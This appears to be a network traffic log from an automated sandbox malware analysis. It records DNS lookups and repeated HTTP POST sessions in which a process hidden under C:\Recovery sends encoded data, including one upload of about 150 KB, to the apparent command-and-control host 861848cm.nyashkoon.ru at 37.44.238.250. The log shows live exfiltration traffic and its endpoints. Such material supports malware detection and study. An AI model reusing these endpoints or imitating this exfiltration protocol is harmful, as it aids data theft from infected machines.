                                                                    Nov 6, 2024 03:39:13.959038019 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.252090931 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.255388021 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.279623985 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.281491041 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.281595945 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.281600952 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.281761885 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.286439896 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.370681047 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.373676062 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.383511066 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.385067940 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.385215044 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.389962912 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.625896931 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.630783081 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.630851030 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.735388994 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.741425991 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.093873024 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.173933029 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.174051046 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.226516008 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.306854010 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.306911945 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.437582970 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.437699080 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.438390970 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.442867994 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.442918062 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.443150997 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.285511017 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.285568953 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.285727024 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.288460970 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.288508892 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.290807962 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.641588926 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.646447897 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.108486891 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.182740927 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.182831049 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.307421923 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.311402082 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.316369057 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.319565058 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.319565058 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.322829962 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.324471951 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.324500084 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.675441027 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.680294037 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.141043901 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.216519117 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.219490051 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.342608929 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.343472958 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.347711086 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.347757101 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.348248959 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.348306894 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.348490953 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.353281021 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.704008102 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.929568052 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.159209013 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.230046034 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.230102062 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.355643034 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.355652094 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.356204033 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.675410032 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.679747105 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.679760933 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.679847002 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.679893970 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.680092096 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.681309938 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.684840918 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.032151937 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.037065983 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.484128952 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.558568954 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.558635950 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.688064098 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.688415051 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693221092 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.693234921 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.693272114 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693407059 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693464041 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.698209047 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.047738075 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.052617073 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.127202034 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.127305031 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.132230997 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.132308006 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.132415056 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.137484074 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.173700094 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.244748116 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.249732971 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.255661964 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.255661964 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.260704994 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.276395082 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.279746056 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.487535954 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.492530107 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.492631912 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.611430883 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.616535902 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.934139013 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.015396118 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.015762091 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.066546917 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.127435923 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.143737078 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.235230923 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.264930964 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.264992952 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.265889883 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270095110 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270153046 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270376921 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270462036 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270682096 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270751953 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270864964 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.275614977 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:40.082228899 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:40.172682047 CET5016580192.168.2.437.44.238.250
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Nov 6, 2024 03:37:14.510160923 CET | 61797 | 53 | 192.168.2.4 | 1.1.1.1
                                                                    Nov 6, 2024 03:37:14.641803026 CET | 53 | 61797 | 1.1.1.1 | 192.168.2.4
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Nov 6, 2024 03:37:14.510160923 CET | 192.168.2.4 | 1.1.1.1 | 0x3d20 | Standard query (0) | 861848cm.nyashkoon.ru | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Nov 6, 2024 03:37:14.641803026 CET | 1.1.1.1 | 192.168.2.4 | 0x3d20 | No error (0) | 861848cm.nyashkoon.ru |  | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                                    • 861848cm.nyashkoon.ru
                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    0 | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:14.656441927 CET | 296 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:15.500901937 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:15.592390060 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 1364
                                                                    Connection: keep-alive
                                                                    Nov 6, 2024 03:37:16.150788069 CET | 272 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:16.388700008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:16.702791929 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    1 | 192.168.2.4 | 49732 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:16.652483940 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:17.467147112 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:17.540344954 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.4 | 49734 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:16.864624977 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:17.676539898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:17.756405115 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:17.739382029 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:18.094842911 CET | 1012 | OUT | Data Raw: 53 52 5f 58 53 5b 50 5a 5a 5f 52 51 54 5e 5b 5c 55 54 59 56 51 54 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XS[PZZ_RQT^[\UTYVQTR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\//6U=84($]=9=_*->0/4.P<=?:<^4$"1'X$.Q-6
                                                                    Nov 6, 2024 03:37:18.561522007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:18.634757996 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:37:18.641371965 CET | 275 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 151876
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:19.001209974 CET | 13596 | OUT | Data Raw: 53 52 5f 58 56 57 50 58 5a 5f 52 51 54 5d 5b 53 55 53 59 5b 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XVWPXZ_RQT][SUSY[Q^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/.S<;+?38\>^*>&_'^4"/9(09%$^7711'X$.Q-
                                                                    Nov 6, 2024 03:37:19.408320904 CET | 1236 | OUT | Data Raw: 53 52 5f 58 56 57 50 58 5a 5f 52 51 54 5d 5b 53 55 53 59 5b 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XVWPXZ_RQT][SUSY[Q^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/.S<;+?38\>^*>&_'^4"/9(09%$^7711'X$.Q-
                                                                    Nov 6, 2024 03:37:19.778764963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:19.779417992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:19.779597998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:20.764262915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.4 | 49740 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:19.780555964 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:20.125818968 CET | 1012 | OUT | Data Raw: 56 51 5f 5e 56 5a 50 5b 5a 5f 52 51 54 58 5b 5f 55 55 59 56 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ_^VZP[Z_RQTX[_UUYVQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;Y>?(^+34(*%Z*^%88_"<.?#Z960_#129'X$.Q-.
                                                                    Nov 6, 2024 03:37:20.585585117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:20.656322002 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.4 | 49743 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:21.003155947 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:21.391925097 CET | 1012 | OUT | Data Raw: 53 55 5a 5a 53 5f 50 5b 5a 5f 52 51 54 5e 5b 5b 55 50 59 5e 51 53 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZZS_P[Z_RQT^[[UPY^QSR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,Y-<(_<0<Y>)%'4Z7?9<.+Y,54$%&)'X$.Q-6
                                                                    Nov 6, 2024 03:37:21.813747883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:21.889919043 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.4 | 49744 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:22.031343937 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:22.375691891 CET | 1012 | OUT | Data Raw: 56 51 5f 5f 53 5f 50 5f 5a 5f 52 51 54 5e 5b 5c 55 57 59 59 51 50 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ__S_P_Z_RQT^[\UWYYQPR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y-?.R+(]> <)1=-*]'8#-?(.%_#7129'X$.Q-6


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.4 | 49747 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:22.779226065 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:23.125720024 CET | 1252 | OUT | Data Raw: 56 52 5a 58 56 5e 50 58 5a 5f 52 51 54 53 5b 53 55 57 59 5e 51 57 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZXV^PXZ_RQTS[SUWY^QWRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^8=?$]> <[>:=Y*=%'+7 )+=#\,6/ %%'X$.Q-
